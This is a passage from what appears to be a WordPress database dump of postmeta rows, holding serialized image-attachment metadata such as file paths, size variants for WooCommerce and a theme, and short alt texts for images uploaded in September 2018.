mg-7-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51952,2781,'_wp_attached_file','2018/09/landing-print-img-7.jpg'),(51953,2781,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1060;s:6:\"height\";i:560;s:4:\"file\";s:31:\"2018/09/landing-print-img-7.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-print-img-7-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"landing-print-img-7-1024x541.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:541;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-print-img-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"landing-print-img-7-768x406.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:406;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:31:\"landing-print-img-7-650x560.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:560;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:31:\"landing-print-img-7-650x560.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:560;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-print-img-7-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"landing-print-img-7-600x317.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:317;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-print-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"landing-print-img-7-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"landing-print-img-7-600x317.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:317;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-print-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51954,2567,'_wp_attachment_image_alt','x'),(51955,2722,'_wp_attachment_image_alt','d'),(51956,2224,'_wp_attachment_image_alt','k'),(51957,2224,'portfolio_single_masonry_image_size',''),(51958,2224,'image_gallery_masonry_image_size','large-height'),(51959,2765,'_wp_attachment_image_alt','m'),(51960,2781,'_wp_attachment_image_alt','v'),(51961,2613,'_wp_attached_file','2018/09/h5-img-17a.jpg'),(51962,2613,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:920;s:4:\"file\";s:22:\"2018/09/h5-img-17a.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"h5-img-17a-300x144.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:144;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"h5-img-17a-1024x491.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:491;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"h5-img-17a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"h5-img-17a-768x368.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:368;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:23:\"h5-img-17a-1536x736.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:736;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:22:\"h5-img-17a-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"h5-img-17a-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:22:\"h5-img-17a-650x920.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:920;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:23:\"h5-img-17a-1300x920.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:920;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"h5-img-17a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"h5-img-17a-600x288.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:288;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"h5-img-17a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"h5-img-17a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"h5-img-17a-600x288.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:288;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"h5-img-17a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51963,2923,'_wp_attachment_image_alt','m'),(51964,2734,'_wp_attached_file','2018/09/landing-vector-img-4.png'),(51965,2734,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:761;s:6:\"height\";i:512;s:4:\"file\";s:32:\"2018/09/landing-vector-img-4.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-4-300x202.png\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-4-650x512.png\";s:5:\"width\";i:650;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-4-650x512.png\";s:5:\"width\";i:650;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"landing-vector-img-4-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-4-600x404.png\";s:5:\"width\";i:600;s:6:\"height\";i:404;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-4-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-4-600x404.png\";s:5:\"width\";i:600;s:6:\"height\";i:404;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51966,2766,'_wp_attached_file','2018/09/landing-img-8.jpg'),(51967,2766,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:25:\"2018/09/landing-img-8.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"landing-img-8-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-img-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"landing-img-8-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"landing-img-8-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:25:\"landing-img-8-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"landing-img-8-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"landing-img-8-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"landing-img-8-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"landing-img-8-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51968,2925,'_wp_attached_file','2018/09/h2-rev-img-5-1.jpg'),(51969,2925,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1202;s:6:\"height\";i:721;s:4:\"file\";s:26:\"2018/09/h2-rev-img-5-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"h2-rev-img-5-1-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"h2-rev-img-5-1-1024x614.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-rev-img-5-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"h2-rev-img-5-1-768x461.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:461;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"h2-rev-img-5-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:27:\"h2-rev-img-5-1-1202x650.jpg\";s:5:\"width\";i:1202;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"h2-rev-img-5-1-650x721.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:721;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"h2-rev-img-5-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"h2-rev-img-5-1-600x360.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-rev-img-5-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"h2-rev-img-5-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"h2-rev-img-5-1-600x360.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-rev-img-5-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51970,2782,'_wp_attached_file','2018/09/landing-vector-img-13.png'),(51971,2782,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:713;s:6:\"height\";i:418;s:4:\"file\";s:33:\"2018/09/landing-vector-img-13.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-13-300x176.png\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-13-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-13-650x418.png\";s:5:\"width\";i:650;s:6:\"height\";i:418;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-13-650x418.png\";s:5:\"width\";i:650;s:6:\"height\";i:418;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"landing-vector-img-13-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-13-600x352.png\";s:5:\"width\";i:600;s:6:\"height\";i:352;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-13-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-13-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-13-600x352.png\";s:5:\"width\";i:600;s:6:\"height\";i:352;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-13-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51972,2766,'_wp_attachment_image_alt','m'),(51973,2613,'_wp_attachment_image_alt','d'),(51974,2925,'_wp_attachment_image_alt','m'),(51975,2768,'_wp_attached_file','2018/09/landing-vector-img-10.png'),(51976,2768,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:493;s:6:\"height\";i:493;s:4:\"file\";s:33:\"2018/09/landing-vector-img-10.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-10-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-10-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"landing-vector-img-10-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-10-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-10-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-10-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51977,2620,'_wp_attached_file','2018/09/landing-pop-up-bottom-sheet.png'),(51978,2620,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:411;s:6:\"height\";i:360;s:4:\"file\";s:39:\"2018/09/landing-pop-up-bottom-sheet.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"landing-pop-up-bottom-sheet-300x263.png\";s:5:\"width\";i:300;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"landing-pop-up-bottom-sheet-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:39:\"landing-pop-up-bottom-sheet-300x360.png\";s:5:\"width\";i:300;s:6:\"height\";i:360;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:39:\"landing-pop-up-bottom-sheet-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:39:\"landing-pop-up-bottom-sheet-300x360.png\";s:5:\"width\";i:300;s:6:\"height\";i:360;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:39:\"landing-pop-up-bottom-sheet-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51979,2734,'_wp_attachment_image_alt','v'),(51980,2946,'_wp_attached_file','2018/09/landing-img-1-1.jpg'),(51981,2946,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:27:\"2018/09/landing-img-1-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"landing-img-1-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-img-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"landing-img-1-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:27:\"landing-img-1-1-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"landing-img-1-1-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"landing-img-1-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"landing-img-1-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"landing-img-1-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"landing-img-1-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51982,2782,'_wp_attachment_image_alt','v'),(51983,2735,'_wp_attached_file','2018/09/landing-vector-img-5.png'),(51984,2735,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:648;s:6:\"height\";i:402;s:4:\"file\";s:32:\"2018/09/landing-vector-img-5.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-5-300x186.png\";s:5:\"width\";i:300;s:6:\"height\";i:186;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"landing-vector-img-5-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-5-600x372.png\";s:5:\"width\";i:600;s:6:\"height\";i:372;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-5-100x100.png\";s:5:\"width\";i:100;s: